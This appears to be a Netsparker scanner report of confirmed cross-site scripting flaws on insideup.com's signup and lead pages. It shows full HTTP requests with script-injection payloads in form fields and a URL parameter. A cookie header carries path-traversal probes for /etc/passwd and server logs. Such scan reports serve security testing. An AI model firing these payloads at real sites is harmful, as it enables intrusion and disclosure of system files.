<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0004D9)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0004D9)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0004D9)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> ..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x0004E7)</script>
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004E7)%3c%2fscript%3e&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:02 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=A4A2AF934F4388311D539868EB15DCA7; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/wede00/

/ppc/leadflow/wede00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0004EF)</script>

Request

GET /ppc/leadflow/wede00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004EF)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
